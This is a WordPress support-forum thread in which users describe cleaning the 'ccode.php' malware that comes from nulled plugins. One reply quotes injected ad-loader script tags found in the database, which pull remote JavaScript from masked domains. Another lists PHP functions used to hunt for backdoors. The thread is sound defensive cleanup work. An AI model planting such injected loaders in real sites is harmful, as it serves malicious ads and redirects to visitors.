Malware Scan ccode.php

@andy786 No sorry, not here, because this a plugin for which I am the author, and I clearly don’t want to link SEOs and search engines to this kind of malware. The plugin has been nulled and can be downloaded from the web where this malware has been injected in various areas. We needed to perform a git compare to find all the suspicious code that have been added, and the code was hidden in multiple files to make sure that if the user finds one suspicious file, some others will still exist. We made an update to protect our users and inform them that they have malware injected on their site if we detect it.

Just check my profile, replies created section, and you’ll find the name of the plugin, but please, don’t post the plugin name on this page.

Regards.

I have the same problem. I delete ccode.php and I was looking in the database “ccode” (no results), changed admin and database passwords and install Wordfence in my website. How can I check if there is any left backdoor or script?

Edit:

In database/wp-options I find “ad_code” with script:

<script>(function(s,u,z,p){s.src=u,s.setAttribute(‘data-zone’,z),p.appendChild(s);})(document.createElement(‘script’),’https://***.com/tag.min.js&#8217;,3388587,document.body||document.documentElement)</script>
<script src=”https://***.sh/pfe/current/tag.min.js?z=3388595&#8243; data-cfasync=”false” async></script>
<script type=”text/javascript” src=”//***.com/400/3388600″ data-cfasync=”false” async=”async”></script>

It’s look like push ad script, I don’t know if it’s related with this malware.

• This reply was modified 4 years, 3 months ago by daimon92.
• This reply was modified 4 years, 3 months ago by daimon92.
• This reply was modified 4 years, 3 months ago by daimon92.
• This reply was modified 4 years, 3 months ago by daimon92.
• This reply was modified 4 years, 3 months ago by daimon92.
• This reply was modified 4 years, 3 months ago by daimon92.

This script is in the malware code, so that is related with with ccode.php.

We know somethings new about this? I really f**k with this malware

The way I have solved it after having deleted the infected files is, creating a blank ccode.php file

At least so far it has worked for me, I hope the tip will serve you.

Hey @karimisaid

I have taken over the development of a website and found the ccode.php which is causing some random ads as well. I have removed the php file itself and as you mentioned. “The plugin ccode.php has been deactivated due to an error: Plugin file does not exist.” is showing on the plugin dashboard. Would you be able to guide me on which database row u had to remove? I am not too familiar with the database.

Extra things I’ve done, after deleting the ccode.php plugging, was to search all the database for its scripts and leftovers.

But before I search the database, I added the malicious plugging ccode back and activated it,to do my testings with website infected and pluggin showing bad adds.

To see the ads, I switched to a different network (4g,or a different WiFi), then used a different browsers (as cookies of prev. Used browser tell the ccode pluggin that you’re the admin who used the same network before). I used the browser of ES explorer in my phone. And search for my website on Google (because this ccode plugging shows bad ads only to visitors who access your website through a search engine, such as Google, yahoo. Etc).
Now I know that the ads are there.
I used a different pc to access the website and see the ads on a desktop browser.
Then right click the homepage and choose source code. A new page will show with all the code of what’s displayed on the page, including the bad ads.
I then go back to the homepage tab, click on one of the ads and make note of the website it takes me to (casino, vondo,.xyz etc). I check in the source code tab in chrome and find that those websites are there, in chrome ctrl F (search) the page for vondo, word in the add, website of ads, etc.

Now I now that those ads lead to .xyz ad websites, etc.

Then i go to phpmyadmin in mysql (host cpanel), back up my database, then search the database for the words found in the links I saw in the source code or when I click on the ads.
The results come with the different tables where those words are mentioned. Within there scripts telling the ads to show, what should happen when an ad is clicked (redirection to links we saw before, auto, or manual, etc). I deleted those scripts. And whatever had to the with the ccode. Including the words ccode itself.

After that, I deleted, on my own risk, some scripts known to be used as backdoor. They include the following php functions
base64
str_rot13
gzuncompress
eval
exec
system
assert
stripslashes

So I searched the database for those functions, then read to see if there is anything suspected within the them, like redirection to websites I don’t know, usually Eastern european sites, etc.

After all that, changed passwords etc.

Hello,

I share information that may be useful to you to eliminate the annoying ccode.php malware, after cleaning the / plugins / folder and eliminating the ccode.php file, we review the database finding a javascript code in the wp_options table

option_name: ad_code

I’m not really sure if the malware affects other sites on the same server, but in my case I had several infected sites so I took on the task of cleaning them …

After cleaning, the problem has not occurred again.

Screenshot: https://snipboard.io/iCX21H.jpg